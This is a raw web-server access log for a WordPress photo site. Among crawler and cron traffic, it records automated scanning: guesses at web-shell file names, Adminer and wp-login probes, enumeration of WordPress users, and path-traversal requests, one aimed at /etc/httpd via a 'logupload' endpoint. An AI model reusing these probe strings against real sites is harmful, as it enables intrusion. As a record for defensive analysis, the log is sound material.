157.20.32.210 - - [18/Oct/2025:08:56:46 -0400] "POST /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:56:46 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:08:56:46 -0400] "POST /adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:56:57 -0400] "POST /adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:56:57 -0400] "POST /adminer/adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:57:04 -0400] "POST /wp-json/buddypress/v1/signup HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/125.0"
157.20.32.210 - - [18/Oct/2025:08:57:15 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17"
185.61.153.107 - - [18/Oct/2025:08:57:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760792236.1536059379577636718750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:08:57:09 -0400] "GET /products209130304?kg=0206580017 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:08:53:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760791996.7610530853271484375000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:08:53:14 -0400] "GET /07.php HTTP/1.1" 404 10905 "http://salhab360photos.com/07.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:53:18 -0400] "GET /08.php HTTP/1.1" 404 10899 "http://salhab360photos.com/08.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:53:26 -0400] "GET /Unix.php HTTP/1.1" 404 10906 "http://salhab360photos.com/Unix.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:53:36 -0400] "GET /eco.php HTTP/1.1" 404 10906 "http://salhab360photos.com/eco.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:53:42 -0400] "GET /F.php HTTP/1.1" 404 10899 "http://salhab360photos.com/F.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:53:48 -0400] "GET /products34938514?kg=0034512516 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
98.70.29.56 - - [18/Oct/2025:08:53:56 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
51.79.229.86 - - [18/Oct/2025:08:53:53 -0400] "GET /pas.php HTTP/1.1" 404 10898 "http://salhab360photos.com/pas.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:54:03 -0400] "GET /pass.php HTTP/1.1" 404 10905 "http://salhab360photos.com/pass.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:54:21 -0400] "POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
51.79.229.86 - - [18/Oct/2025:08:54:14 -0400] "GET /key.php HTTP/1.1" 404 10905 "http://salhab360photos.com/key.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:54:22 -0400] "GET /WP.php HTTP/1.1" 404 10901 "http://salhab360photos.com/WP.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:54:28 -0400] "GET /macro.php HTTP/1.1" 404 10904 "http://salhab360photos.com/macro.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:54:34 -0400] "GET /products60908046?kg=0060165346 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
5.78.127.100 - - [18/Oct/2025:08:54:36 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/7.0)"
51.79.229.86 - - [18/Oct/2025:08:54:43 -0400] "GET /replaces.php HTTP/1.1" 404 10905 "http://salhab360photos.com/replaces.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:54:46 -0400] "GET /replay.php HTTP/1.1" 404 10904 "http://salhab360photos.com/replay.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:54:48 -0400] "GET /lps.php HTTP/1.1" 404 10896 "http://salhab360photos.com/lps.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:54:55 -0400] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
18.171.61.169 - - [18/Oct/2025:08:53:22 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
206.189.247.132 - - [18/Oct/2025:08:53:22 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
152.42.157.60 - - [18/Oct/2025:08:53:24 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
196.240.60.216 - - [18/Oct/2025:08:53:24 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:53:23 -0400] "GET /09.php HTTP/1.1" 404 10898 "http://salhab360photos.com/09.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:53:31 -0400] "GET /col.php HTTP/1.1" 404 10899 "http://salhab360photos.com/col.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:53:34 -0400] "GET /products60909882?kg=0060167160 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.107 - - [18/Oct/2025:08:53:40 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=212093 HTTP/1.1" 200 31248 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.200.15.79 - - [18/Oct/2025:08:53:41 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MDDSJS; rv:11.0) like Gecko"
51.79.229.86 - - [18/Oct/2025:08:53:47 -0400] "GET /pw.php HTTP/1.1" 404 10898 "http://salhab360photos.com/pw.php" "Go-http-client/2.0"
195.200.15.79 - - [18/Oct/2025:08:53:49 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MDDSJS; rv:11.0) like Gecko"
66.249.64.105 - - [18/Oct/2025:08:53:59 -0400] "GET /products5816588?kg=0005745735 HTTP/1.1" 200 29470 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:54:08 -0400] "GET /ps.php HTTP/1.1" 404 10903 "http://salhab360photos.com/ps.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:54:20 -0400] "POST /wp-cron.php?doing_wp_cron=1760792059.9519000053405761718750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:08:54:33 -0400] "GET /macros.php HTTP/1.1" 404 10897 "http://salhab360photos.com/macros.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:54:37 -0400] "GET /repeat.php HTTP/1.1" 404 10903 "http://salhab360photos.com/repeat.php" "Go-http-client/2.0"
182.253.50.132 - - [18/Oct/2025:08:54:44 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
182.253.50.132 - - [18/Oct/2025:08:54:45 -0400] "GET /xmlrpc.php HTTP/1.1" 405 62 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
182.253.50.132 - - [18/Oct/2025:08:54:48 -0400] "GET /wp-json/wp/v2/users HTTP/1.1" 200 706 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
51.79.229.86 - - [18/Oct/2025:08:54:55 -0400] "GET /landingpage.php HTTP/1.1" 404 10896 "http://salhab360photos.com/landingpage.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:55:04 -0400] "GET /rrr.php HTTP/1.1" 404 10896 "http://salhab360photos.com/rrr.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:57:16 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.20"
157.20.32.210 - - [18/Oct/2025:08:57:10 -0400] "POST /adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:57:10 -0400] "POST /adminer/adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:57:20 -0400] "POST /adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:57:20 -0400] "POST /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:57:26 -0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://salhab360photos.com/info.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0"
157.20.32.210 - - [18/Oct/2025:08:57:37 -0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://salhab360photos.com/info.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0"
51.79.229.86 - - [18/Oct/2025:08:57:06 -0400] "GET /aek.php HTTP/1.1" 503 854 "http://salhab360photos.com/aek.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:57:50 -0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://salhab360photos.com/info.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0"
157.20.32.210 - - [18/Oct/2025:08:58:02 -0400] "POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1" 403 1242 "https://salhab360photos.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/140.0.2 (x64 de)"
157.20.32.210 - - [18/Oct/2025:08:57:58 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:08:57:59 -0400] "GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1" 200 0 "https://salhab360photos.com/info.html" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/9.0"
157.20.32.210 - - [18/Oct/2025:08:58:09 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:08:58:10 -0400] "GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1" 200 0 "https://salhab360photos.com/info.html" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/9.0"
157.20.32.210 - - [18/Oct/2025:08:58:22 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1"
51.79.229.86 - - [18/Oct/2025:08:57:54 -0400] "GET /lek.php HTTP/1.1" 503 854 "http://salhab360photos.com/lek.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:58:49 -0400] "POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
206.189.247.132 - - [18/Oct/2025:08:58:59 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
157.20.32.210 - - [18/Oct/2025:08:57:10 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:08:57:10 -0400] "POST /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:57:10 -0400] "POST /_adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:57:10 -0400] "POST /_adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:57:17 -0400] "POST /wp-json/buddypress/v1/signup HTTP/1.1" 503 854 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/125.0"
157.20.32.210 - - [18/Oct/2025:08:57:20 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:08:57:20 -0400] "POST /adminer/adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:57:20 -0400] "POST /_adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:57:20 -0400] "POST /_adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:57:53 -0400] "POST /casa/nodes/thumbprints HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:58:04 -0400] "POST /casa/nodes/thumbprints HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:08:57:45 -0400] "GET /products60908744?kg=0060166037 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:08:58:17 -0400] "POST /casa/nodes/thumbprints HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:58:23 -0400] "GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1" 200 0 "https://salhab360photos.com/info.html" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/9.0"
157.20.32.210 - - [18/Oct/2025:08:58:25 -0400] "POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
157.20.32.210 - - [18/Oct/2025:08:58:30 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:58:36 -0400] "POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
157.20.32.210 - - [18/Oct/2025:08:58:41 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:58:54 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:58:57 -0400] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.2) AppleWebKit/619.14.1 (KHTML, like Gecko) Version/17.7.52 Safari/619.14.1"
157.20.32.210 - - [18/Oct/2025:08:59:21 -0400] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.2) AppleWebKit/619.14.1 (KHTML, like Gecko) Version/17.7.52 Safari/619.14.1"
51.79.229.86 - - [18/Oct/2025:08:58:29 -0400] "GET /nek.php HTTP/1.1" 503 854 "http://salhab360photos.com/nek.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:59:31 -0400] "GET /oek.php HTTP/1.1" 503 854 "http://salhab360photos.com/oek.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:59:51 -0400] "GET /products60923166?kg=0060180282 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:09:00:22 -0400] "GET /?products11435474?kg=0011296100 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:09:00:56 -0400] "GET /products60870686?kg=0060128442 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.254 - - [18/Oct/2025:09:01:58 -0400] "GET /products60909194?kg=0060166480 HTTP/1.1" 503 854 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.171.61.169 - - [18/Oct/2025:08:58:59 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
146.190.11.185 - - [18/Oct/2025:08:59:01 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
20.171.207.254 - - [18/Oct/2025:08:58:48 -0400] "GET /products60922674?kg=0060179796 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:08:59:08 -0400] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.2) AppleWebKit/619.14.1 (KHTML, like Gecko) Version/17.7.52 Safari/619.14.1"
157.20.32.210 - - [18/Oct/2025:09:00:18 -0400] "POST /AdminService/urest/v1/LogonResource HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0"
157.20.32.210 - - [18/Oct/2025:09:00:33 -0400] "GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.9"
51.79.229.86 - - [18/Oct/2025:09:00:03 -0400] "GET /pek.php HTTP/1.1" 503 854 "http://salhab360photos.com/pek.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:00:29 -0400] "POST /AdminService/urest/v1/LogonResource HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0"
157.20.32.210 - - [18/Oct/2025:09:00:42 -0400] "POST /AdminService/urest/v1/LogonResource HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0"
157.20.32.210 - - [18/Oct/2025:09:00:56 -0400] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:105.0) Gecko/20100101 Firefox/105.0"
157.20.32.210 - - [18/Oct/2025:09:01:07 -0400] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:105.0) Gecko/20100101 Firefox/105.0"
157.20.32.210 - - [18/Oct/2025:09:01:19 -0400] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:105.0) Gecko/20100101 Firefox/105.0"
51.79.229.86 - - [18/Oct/2025:09:00:35 -0400] "GET /qek.php HTTP/1.1" 200 0 "http://salhab360photos.com/qek.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:02:15 -0400] "GET /rek.php HTTP/1.1" 503 854 "http://salhab360photos.com/rek.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:09:02:40 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=238421 HTTP/1.1" 200 28774 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:09:03:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760792596.8664219379425048828125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
98.70.29.56 - - [18/Oct/2025:09:02:50 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
185.61.153.107 - - [18/Oct/2025:09:03:23 -0400] "POST /wp-cron.php?doing_wp_cron=1760792603.0687160491943359375000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:09:03:29 -0400] "GET /tek.php HTTP/1.1" 404 10906 "http://salhab360photos.com/tek.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:42 -0400] "GET /wek.php HTTP/1.1" 404 10903 "http://salhab360photos.com/wek.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:46 -0400] "GET /yek.php HTTP/1.1" 404 10906 "http://salhab360photos.com/yek.php" "Go-http-client/2.0"
157.20.32.210 - admin [18/Oct/2025:09:03:47 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.16 (KHTML, like Gecko) Version/8.0 Safari/537.16"
51.79.229.86 - - [18/Oct/2025:09:03:50 -0400] "GET /kentsudin.php HTTP/1.1" 404 10905 "http://salhab360photos.com/kentsudin.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:51 -0400] "GET /udil.php HTTP/1.1" 404 10899 "http://salhab360photos.com/udil.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:55 -0400] "GET /upil.php HTTP/1.1" 404 10904 "http://salhab360photos.com/upil.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:57 -0400] "GET /ipil.php HTTP/1.1" 404 10897 "http://salhab360photos.com/ipil.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:58 -0400] "GET /upin.php HTTP/1.1" 404 10903 "http://salhab360photos.com/upin.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:04:03 -0400] "GET /ud1l.php HTTP/1.1" 404 10906 "http://salhab360photos.com/ud1l.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:09:04:04 -0400] "GET /products60886604?kg=0060144167 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:09:04:06 -0400] "GET /ud1n.php HTTP/1.1" 404 10903 "http://salhab360photos.com/ud1n.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:04:07 -0400] "GET /samsudin.php HTTP/1.1" 404 10905 "http://salhab360photos.com/samsudin.php" "Go-http-client/2.0"
